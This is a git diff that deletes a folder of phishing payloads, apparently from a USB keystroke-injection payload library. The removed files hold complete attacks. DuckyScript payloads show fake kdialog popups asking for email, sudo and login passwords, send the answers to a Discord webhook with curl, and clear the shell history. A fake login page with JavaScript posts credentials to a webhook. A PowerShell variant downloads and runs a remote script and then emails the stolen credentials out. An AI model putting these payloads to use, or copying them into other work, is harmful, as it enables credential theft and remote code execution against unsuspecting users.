diff --git a/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/README.md b/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/README.md deleted file mode 100644 index 99ab479..0000000 --- a/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/README.md +++ /dev/null @@ -1,28 +0,0 @@ - -# Exfiltrate Email And Password By Phising - Linux ✅ - -A script used to exfiltrate the email and the email password by a popup (KDE/kdialog based) phishing based on linux systems. - -**Category**: Phishing, Credentials - -## Description - -A script used to exfiltrate the email and the email password by a popup (KDE/kdialog based) phishing based on linux systems. - -Opens a shell, get the email and the email password by a popup, send the input to a Discord webhook. - -## Getting Started - -### Dependencies - -* Internet Connection -* Discord webhook -* KDE/kdialog based - -### Executing program - -* Plug in your device - -### Settings - -* Set the Discord webhook \ No newline at end of file diff --git a/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt b/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt deleted file mode 100644 index 2c64d66..0000000 --- a/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt +++ /dev/null @@ -1,35 +0,0 @@ - -REM ########################################################### -REM # | -REM # Title : Exfiltrate Email And Password By Phising | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Credentials, Phishing | -REM # Target : Linux | -REM # | -REM ########################################################### - -REM Requirements: -REM - Internet Connection -REM - Discord webhook -REM - KDE/kdialog based - -DELAY 1000 -CTRL-ALT t -DELAY 2000 - - -REM #### POPUP SECTION #### - - -REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks// -DEFINE WEBHOOK example.com -STRING WEBHOOK_URL=" -STRING WEBHOOK -STRING " -ENTER -DELAY 500 - -REM All-in-one is important -STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit; -ENTER diff --git a/payloads/library/phishing/ExfiltrateSudoPasswordByPhishing_Linux/README.md b/payloads/library/phishing/ExfiltrateSudoPasswordByPhishing_Linux/README.md deleted file mode 100644 index 71514f5..0000000 --- a/payloads/library/phishing/ExfiltrateSudoPasswordByPhishing_Linux/README.md +++ /dev/null @@ -1,26 +0,0 @@ - -# Exfiltrate Sudo Password By Phishing - Linux ✅ - -A script used to exfiltrate the sudo password by a popup phishing based on linux systems. - -**Category**: Credentials, Phishing - -## Description - -A script used to exfiltrate the sudo password by a popup phishing based on linux systems. - -Opens a shell, get the password by a popup, send the input to a Discord webhook. - -## Getting Started - -### Dependencies - -* Internet Connection - -### Executing program - -* Plug in your device - -### Settings - -* Set the Discord webhook \ No newline at end of file diff --git a/payloads/library/phishing/ExfiltrateSudoPasswordByPhishing_Linux/payload.txt b/payloads/library/phishing/ExfiltrateSudoPasswordByPhishing_Linux/payload.txt deleted file mode 100644 index 94c6606..0000000 --- a/payloads/library/phishing/ExfiltrateSudoPasswordByPhishing_Linux/payload.txt +++ /dev/null @@ -1,34 +0,0 @@ - -REM ####################################################### -REM # | -REM # Title : Exfiltrate Sudo Password By Phishing | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Credentials, Phishing | -REM # Target : Linux | -REM # | -REM ####################################################### - -REM Requirements: -REM - Internet Connection -REM - Discord webhook - -DELAY 1000 -CTRL-ALT t -DELAY 2000 - - -REM #### POPUP SECTION #### - - -REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks// -DEFINE WEBHOOK example.com -STRING WEBHOOK_URL=" -STRING WEBHOOK -STRING " -ENTER -DELAY 500 - -REM All-in-one is important -STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --password "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit; -ENTER \ No newline at end of file diff --git a/payloads/library/phishing/StandardPhishingCampaign_Linux/DuckyScript-DOC.md b/payloads/library/phishing/StandardPhishingCampaign_Linux/DuckyScript-DOC.md deleted file mode 100644 index 5df5f8c..0000000 --- a/payloads/library/phishing/StandardPhishingCampaign_Linux/DuckyScript-DOC.md +++ /dev/null @@ -1,44 +0,0 @@ -# DuckyScript Documentation - -This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page. - -- First, the script creates a new random directory using the mktemp command and assigns its path to the dir_name variable. The DELAY command is used to pause the script execution for 500 milliseconds. -```DuckyScript - REM Create a random directory - STRINGLN dir_name=$(mktemp -d) - DELAY 500 -``` - -- Next, the script sets a timer using the sleep command to delete the directory after 60 minutes (3600 seconds). The rm -rf command is used to remove the directory and its contents. The & character is used to run this command in the background, allowing the script to continue running. Another DELAY command is used to pause the script execution for 500 milliseconds. -```DuckyScript - REM Delete the directory after 60 minutes (3600 seconds) - STRINGLN (sleep 3600 && rm -rf $dir_name) & - DELAY 500 -``` - -- The script then moves into the directory using the cd command and the dir_name variable. Another DELAY command is used to pause the script execution for 500 milliseconds. -```DuckyScript - REM Move into the directory - STRINGLN cd $dir_name - DELAY 500 -``` - -- Next, the script downloads the zip file from the specified URL using the curl command. The LOk option is used to download the file and give it the same name as the original file. The #ZIP_LINK placeholder should be replaced with the actual URL of the zip file. Another DELAY command is used to pause the script execution for 500 milliseconds. -```DuckyScript - REM Download the zip from your own link - STRINGLN curl -LOk "#ZIP_LINK" - DELAY 500 -``` - -- The script then unzips the downloaded file using the unzip command. The DELAY command is used again to pause the script execution for 500 milliseconds. -```DuckyScript - REM Unzip it - STRINGLN unzip file.zip - DELAY 500 -``` - -- Finally, the script opens the login page using the xdg-open command and the login.html file. The exit command is used to terminate the script. -```DuckyScript - REM Open the login page - STRINGLN xdg-open login.html; exit; -``` \ No newline at end of file diff --git a/payloads/library/phishing/StandardPhishingCampaign_Linux/README.md b/payloads/library/phishing/StandardPhishingCampaign_Linux/README.md deleted file mode 100644 index 4c97e42..0000000 --- a/payloads/library/phishing/StandardPhishingCampaign_Linux/README.md +++ /dev/null @@ -1,190 +0,0 @@ -# Standard Phishing Campaign - -A script used to exfiltrate the Standard username and password by a phishing campaign. - -**Category**: Phishing - -## Description - -A script used to exfiltrate the Standard username and password by a phishing campaign. - -This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page. - -This payload was created and tested on Linux but since the HTML markup code and JavaScript language are cross platform it will certainly be usable on machines running Windows or MacOS as well. However, it is essential to modify the DuckyScript script appropriately according to the terminal emulator used (PowerShell for Windows, Shell MacOS for Macs) since the commands are often not the same. To make it easier to use below you can find the various tested configurations, at the moment it is not available for macOS because since I do not have one it cannot be tested and therefore I cannot give the certainty that it works, however I hope that in the Hak5 community there may be someone who can contribute to this payload by completing it with this missing part. - -## Payload.txt config - Windows 10/11 - Tested on Windows 11 - -```DuckyScript - DELAY 1000 - GUI r - DELAY 1000 - STRING powershell - ENTER - DELAY 2000 - - STRINGLN do { $dir_name = [IO.Path]::Combine([IO.Path]::GetTempPath(), [IO.Path]::GetRandomFileName()) } while (Test-Path $dir_name) - DELAY 500 - STRINGLN New-Item -ItemType Directory -Path $dir_name -ErrorAction Stop - DELAY 500 - STRINGLN Set-Location $dir_name -ErrorAction Stop - DELAY 500 - STRINGLN Invoke-WebRequest -Uri "#ZIP_LINK" -OutFile file.zip - DELAY 2000 - STRINGLN Expand-Archive file.zip - DELAY 500 - STRINGLN Invoke-Item login.html - DELAY 500 -``` - -## Payload.txt config - Linux (Debian based) - Tested on Ubuntu 23.04 - -```DuckyScript - DELAY 1000 - CTRL-ALT t - DELAY 2000 - - REM Actual script... -``` - -# Getting Started - -## Dependencies - -* Internet Connection -* You own ZIP link -* Discord webhook (or whatever you want to use for the exfiltration) -* Python -* 'ExecutionPolicy Bypass' if used in Windows 10/11 - -## Settings - -* Set the Discord wehbook (or whatever you want) into the script.js file at line 3 -```JavaScript -// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data -const discord_webhook_url = "https://discord.com/api/webhooks/123/abc"; -``` - -* Set the redirect link that you want to use when the payload is sent -```JavaScript -// DEFINE the redirect link preferred -window.location.href = "https://www.example.com"; -``` - -* Set the ZIP link as described in the payload.txt -```DuckyScript -REM REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js'] -DEFINE #ZIP_LINK example.com/file.zip -``` - -## JavaScript/HTML Documentation - -- This JavaScript code aims to send the credentials entered in an HTML form to a Discord Webhook or any other remote server. The code is written as an asynchronous function named **send_login()**, which is called when the user presses the login button in the HTML form. -```JavaScript -async function send_login() { - // ... -} -``` - -- The first thing the code does is to set the **discord_webhook_url** constant to the Discord Webhook URL where the message containing the credentials will be sent. Then, the **email** and **password** values are retrieved from the form input fields using their **id** attributes. -```JavaScript - // SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data - const discord_webhook_url = "https://discord.com/api/webhooks/123/abc"; - - // Retrieve data from POST form - const email = document.getElementById('email').value; - const password = document.getElementById('password').value; -``` - -- After that, a **message** variable is created by concatenating the **email** and **password** values. This message will be sent to the Discord Webhook. -```JavaScript - // Create message content - const message = "Email: " + email + " \n " + "Password: " + password; -``` - -- The **fetch()** method is used to send an HTTP POST request to the Discord Webhook URL. The request body is a JSON object that contains the **message** content. If the response status is **ok**, the user is redirected to the specified URL, which is set in the **window.location.href** property. Otherwise, a generic error is thrown. -```JavaScript - // Send POST request to Discord webhook URL - const response = await fetch(discord_webhook_url, { - method: "POST", - headers: { - "Content-Type": "application/json" - }, - body: JSON.stringify({ content: message }) - }); - if (response.ok) { - // DEFINE the redirect link preferred - window.location.href = "https://www.example.com"; - } else { - // Otherwise, throw a generic error - throw new Error('Generic error!'); -``` - -- If an error occurs during the execution of the **fetch()** method, it will be caught by the **catch()** block and logged to the console using the **console.error()** method. -```JavaScript - try{ - // ... - } catch (error) { - // Log any errors to the console - console.error(error); - } -``` - -- To use this code, you need to replace the **discord_webhook_url** constant with the actual Discord Webhook URL or the URL of any other remote server that you want to send the message to. You also need to ensure that the **id** attributes of the email and password input fields in the HTML form match the values used in the **getElementById()** method calls. Finally, you need to call the **send_login()** function when the user submits the form. -```HTML -
-
- - -
-
- - -
- -
-``` - -## DuckyScript Documentation - -This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page. - -- First, the script creates a new random directory using the mktemp command and assigns its path to the dir_name variable. The DELAY command is used to pause the script execution for 500 milliseconds. -```DuckyScript - REM Create a random directory - STRINGLN dir_name=$(mktemp -d) - DELAY 500 -``` - -- Next, the script sets a timer using the sleep command to delete the directory after 60 minutes (3600 seconds). The rm -rf command is used to remove the directory and its contents. The & character is used to run this command in the background, allowing the script to continue running. Another DELAY command is used to pause the script execution for 500 milliseconds. -```DuckyScript - REM Delete the directory after 60 minutes (3600 seconds) - STRINGLN (sleep 3600 && rm -rf $dir_name) & - DELAY 500 -``` - -- The script then moves into the directory using the cd command and the dir_name variable. Another DELAY command is used to pause the script execution for 500 milliseconds. -```DuckyScript - REM Move into the directory - STRINGLN cd $dir_name - DELAY 500 -``` - -- Next, the script downloads the zip file from the specified URL using the curl command. The LOk option is used to download the file and give it the same name as the original file. The #ZIP_LINK placeholder should be replaced with the actual URL of the zip file. Another DELAY command is used to pause the script execution for 500 milliseconds. -```DuckyScript - REM Download the zip from your own link - STRINGLN curl -LOk "#ZIP_LINK" - DELAY 500 -``` - -- The script then unzips the downloaded file using the unzip command. The DELAY command is used again to pause the script execution for 500 milliseconds. -```DuckyScript - REM Unzip it - STRINGLN unzip file.zip - DELAY 500 -``` - -- Finally, the script opens the login page using the xdg-open command and the login.html file. The exit command is used to terminate the script. -```DuckyScript - REM Open the login page - STRINGLN xdg-open login.html; exit; -``` \ No newline at end of file diff --git a/payloads/library/phishing/StandardPhishingCampaign_Linux/Script-DOC.md b/payloads/library/phishing/StandardPhishingCampaign_Linux/Script-DOC.md deleted file mode 100644 index d7e879a..0000000 --- a/payloads/library/phishing/StandardPhishingCampaign_Linux/Script-DOC.md +++ /dev/null @@ -1,55 +0,0 @@ -# JavaScript/HTML Documentation - -- This JavaScript code aims to send the credentials entered in an HTML form to a Discord Webhook or any other remote server. The code is written as an asynchronous function named **send_login()**, which is called when the user presses the login button in the HTML form. -```JavaScript -async function send_login() { - // ... -} -``` - -- The first thing the code does is to set the **discord_webhook_url** constant to the Discord Webhook URL where the message containing the credentials will be sent. Then, the **email** and **password** values are retrieved from the form input fields using their **id** attributes. -```JavaScript - // SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data - const discord_webhook_url = "https://discord.com/api/webhooks/123/abc"; - - // Retrieve data from POST form - const email = document.getElementById('email').value; - const password = document.getElementById('password').value; -``` - -- After that, a **message** variable is created by concatenating the **email** and **password** values. This message will be sent to the Discord Webhook. -```JavaScript - // Create message content - const message = "Email: " + email + " \n " + "Password: " + password; -``` - -- The **fetch()** method is used to send an HTTP POST request to the Discord Webhook URL. The request body is a JSON object that contains the **message** content. If the response status is **ok**, the user is redirected to the specified URL, which is set in the **window.location.href** property. Otherwise, a generic error is thrown. -```JavaScript - // Send POST request to Discord webhook URL - const response = await fetch(discord_webhook_url, { - method: "POST", - headers: { - "Content-Type": "application/json" - }, - body: JSON.stringify({ content: message }) - }); - if (response.ok) { - // DEFINE the redirect link preferred - window.location.href = "https://www.example.com"; - } else { - // Otherwise, throw a generic error - throw new Error('Generic error!'); -``` - -- If an error occurs during the execution of the **fetch()** method, it will be caught by the **catch()** block and logged to the console using the **console.error()** method. -```JavaScript - try{ - // ... - } catch (error) { - // Log any errors to the console - console.error(error); - } -``` - -- To use this code, you need to replace the **discord_webhook_url** constant with the actual Discord Webhook URL or the URL of any other remote server that you want to send the message to. You also need to ensure that the **id** attributes of the email and password input fields in the HTML form match the values used in the **getElementById()** method calls. Finally, you need to call the **send_login()** function when the user submits the form. -```HTML \ No newline at end of file diff --git a/payloads/library/phishing/StandardPhishingCampaign_Linux/Script.zip b/payloads/library/phishing/StandardPhishingCampaign_Linux/Script.zip deleted file mode 100644 index c45584d..0000000 Binary files a/payloads/library/phishing/StandardPhishingCampaign_Linux/Script.zip and /dev/null differ diff --git a/payloads/library/phishing/StandardPhishingCampaign_Linux/login.html b/payloads/library/phishing/StandardPhishingCampaign_Linux/login.html deleted file mode 100644 index 588d07a..0000000 --- a/payloads/library/phishing/StandardPhishingCampaign_Linux/login.html +++ /dev/null @@ -1,34 +0,0 @@ - - - - Form di Login con Bootstrap - - - - - - - - -
-

Special and super secure login

-
-
- - -
-
- - -
-
- -
- -
-
- - - diff --git a/payloads/library/phishing/StandardPhishingCampaign_Linux/payload.txt b/payloads/library/phishing/StandardPhishingCampaign_Linux/payload.txt deleted file mode 100644 index d924982..0000000 --- a/payloads/library/phishing/StandardPhishingCampaign_Linux/payload.txt +++ /dev/null @@ -1,51 +0,0 @@ -REM ############################################# -REM # | -REM # Title : Standard Phishing Campaign | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Phishing | -REM # Target : Linux | -REM # | -REM ############################################# - -REM Requirements: -REM - Internet Connection -REM - You own ZIP link -REM - Discord webhook (or whatever you want to use for the exfiltration) -REM - Python -REM - 'ExecutionPolicy Bypass' if used in Windows 10/11 - - -REM REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js'] -DEFINE #ZIP_LINK example.com/file.zip - - -DELAY 1000 -CTRL-ALT t -DELAY 2000 - - -REM #### Main SECTION #### - -REM Create a random directory -STRINGLN dir_name=$(mktemp -d) -DELAY 500 - -REM Delete the directory after 60 minutes (3600 seconds) -STRINGLN (sleep 3600 && rm -rf $dir_name) & -DELAY 500 - -REM Move into the directory -STRINGLN cd $dir_name -DELAY 500 - -REM Download the zip from your own link -STRINGLN curl -LOk "#ZIP_LINK" -DELAY 500 - -REM Unzip it -STRINGLN unzip file.zip -DELAY 500 - -REM Open the login page -STRINGLN xdg-open login.html; exit; diff --git a/payloads/library/phishing/StandardPhishingCampaign_Linux/script.js b/payloads/library/phishing/StandardPhishingCampaign_Linux/script.js deleted file mode 100644 index 4f23181..0000000 --- a/payloads/library/phishing/StandardPhishingCampaign_Linux/script.js +++ /dev/null @@ -1,33 +0,0 @@ -async function send_login() { - // SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data - const discord_webhook_url = "https://discord.com/api/webhooks/123/abc"; - - // Retrieve data from POST form - const email = document.getElementById('email').value; - const password = document.getElementById('password').value; - - // Create message content - const message = "Email: " + email + " \n " + "Password: " + password; - - try { - // Send POST request to Discord webhook URL - const response = await fetch(discord_webhook_url, { - method: "POST", - headers: { - "Content-Type": "application/json" - }, - body: JSON.stringify({ content: message }) - }); - if (response.ok) { - // DEFINE the redirect link preferred - window.location.href = "https://www.example.com"; - } else { - // Otherwise, throw a generic error - throw new Error('Generic error!'); - } - } catch (error) { - // Log any errors to the console - console.error(error); - } - -} \ No newline at end of file diff --git a/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md b/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md deleted file mode 100644 index 3667e62..0000000 --- a/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md +++ /dev/null @@ -1,59 +0,0 @@ - -# Standard Phishing Payload Using kdialog - Linux ✅ - -A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog. - -**Category**: Phishing - -## Description - -A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog. - -Opens a shell, get the data by a popup, send the input to a Discord webhook (or whatever you want to use for the exfiltration). - -## Getting Started - -### Dependencies - -* Internet Connection for the Exfiltration - -### Settings - -* Set the Discord webhook -* Set the payload as you want - -### cURL Command - -With this payload you can send a post message using cURL shell command line to the webhook or whatever you choose for the exfiltration. You should replace the tag *\* with the user input. - -- `curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$()\"}" $WEBHOOK_URL);` - -### kdialog - Popup command - -KDialog can be used to show nice dialog boxes from shell scripts. You can't acquire multiple input in one popup, so you should use multiple popup. You can set the title, the message, the input type and so and so on... - -- Simple message popup: `kdialog --title "" --msgbox ""; ` -- Plaintext input popup (i.e. Username): `kdialog --title "" --inputbox "";` -- Hiddentext input popup (i.e. Password): `kdialog --title "" --password "" --default "password";` - -### The Payload - -The payload will merge the cURL command with the kdialog popup output (so the user input) as the following command... - -```shell -$(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; kdialog --title "Insert your Username" --inputbox "Username"; kdialog --title "Insert your Password" --password "Password" --default "password";)\"}" $WEBHOOK_URL); -``` - -You can put into the payload something that will clear the last shell history closing the shell at the end of the execution, adding this line `history -c; exit;` - -```shell -$(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; kdialog --title "Insert your Username" --inputbox "Username"; kdialog --title "Insert your Password" --password "Password" --default "password";)\"}" $WEBHOOK_URL); history -c; exit; -``` - -### FAQs - -- Why put the entire payload in one line? -Generally it is recommended to divide the various steps at different times by dividing each command with some DELAY, in this case it is not recommended because phishing-type cyber attacks often tend to take a long time. How can you tell how long a user should take to enter their data? What if he doesn't remember his email? It is important to consider the slow factor, which, in theory, can take really long and in any case cannot be dynamically predicted. - -- Why is used the 'cyber-attack' word? -This payload is intended to be a working tool for performing cybersecurity analysis and is not intended to harm malicious users in any way. This term is used for simplicity in speaking but is really meant to be a study tool that can be worked on. \ No newline at end of file diff --git a/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/payload.txt b/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/payload.txt deleted file mode 100644 index ad9b93c..0000000 --- a/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/payload.txt +++ /dev/null @@ -1,54 +0,0 @@ - -REM ########################################################## -REM # | -REM # Title : Standard Phishing Payload Using kdialog | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Phishing | -REM # Target : Linux | -REM # | -REM ########################################################## - -REM Requirements: -REM - EXFILTRATION: -REM - Internet Connection -REM - Discord webhook for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Dropbox, Telegram and so on..) -REM - PHISHING: -REM - This payload is usable on the Linux system where is installed 'kdialog', but you can use whatever you want for simulate the popup with the intent to take the input -REM - It is important that the popup payload occurs in a single line so that the traces of data collection are eliminated immediately after submission. This is precisely why you can see the REMed code to get a good understanding of what it is all about. - -REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks// -DEFINE WEBHOOK example.com - -DELAY 1000 -CTRL-ALT t -DELAY 2000 - - -REM #### Phishing #### - - -STRING WEBHOOK_URL=" -STRING WEBHOOK -STRING " -ENTER -DELAY 500 - - -REM A short and efficient cURL command to send an HTTP POST request to a webhook URL with JSON data in the request body. -STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$( - -REM A compact command that uses kdialog to display a popup message prompting (into the curl content section) the user to enter their username and password to proceed. You can't acquire multiple input in one popup, so you should use multiple popup, as i wrote here. -REM You can set the title, the message, the input type and so and so on... -STRING kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; -STRING kdialog --title "Insert your Username" --inputbox "Username"; -STRING kdialog --title "Insert your Password" --password "Password" --default "password"; - -REM The end part of the curl payload... -STRING )\"}" $WEBHOOK_URL); - -REM history -c will clear the last shell history and the exit command will close the popup at the end of the execution -STRING history -c; exit; - -REM All-In-One doesn't need delay time -ENTER diff --git a/payloads/library/phishing/duckyphish/duckyphish.ps1 b/payloads/library/phishing/duckyphish/duckyphish.ps1 deleted file mode 100644 index 2c87593..0000000 --- a/payloads/library/phishing/duckyphish/duckyphish.ps1 +++ /dev/null @@ -1,13 +0,0 @@ -clear -$mycredentials = Get-Credential -Write-Host "ALERT your google account has been compromised! please enter your credentials for verification" - -$name = Read-Host "Username/Email" -$pwd = Read-Host "password" - - - - -Send-MailMessage -SmtpServer smtp.gmail.com -Port 587 -UseSsl -From sendingemailhere -To receiveemailhere -Subject 'Hello from the ducky' -Body ("$name $pwd") -Credential ($mycredentials) -exit - diff --git a/payloads/library/phishing/duckyphish/duckyphish.txt b/payloads/library/phishing/duckyphish/duckyphish.txt deleted file mode 100644 index 7e1841b..0000000 --- a/payloads/library/phishing/duckyphish/duckyphish.txt +++ /dev/null @@ -1,25 +0,0 @@ -REM SCRIPT CREATED BY MAKOZORT, WATCH THIS VIDEO ON HOW TO USE IT: https://youtu.be/NeD5kRLatOU -DELAY 1000 -GUI r -DELAY 500 -STRING powershell -w maximized -ENTER -DELAY 200 -REM now we read in the script as a scriptblock -STRING $script = [scriptblock]::Create((New-Object Net.WebClient).DownloadString('LINK HERE')); -DELAY 500 -ENTER -DELAY 2000 -STRING Invoke-Command -ScriptBlock $script -DELAY 500 -ENTER -REM enter credentials for "Get-Credential" powershell module -DELAY 500 -STRING firsthalfofemail -SHIFT 2 -STRING gmail.com -DELAY 500 -TAB -STRING PASSWORD -DELAY 500 -ENTER diff --git a/payloads/library/phishing/placeholder b/payloads/library/phishing/placeholder deleted file mode 100644 index e69de29..0000000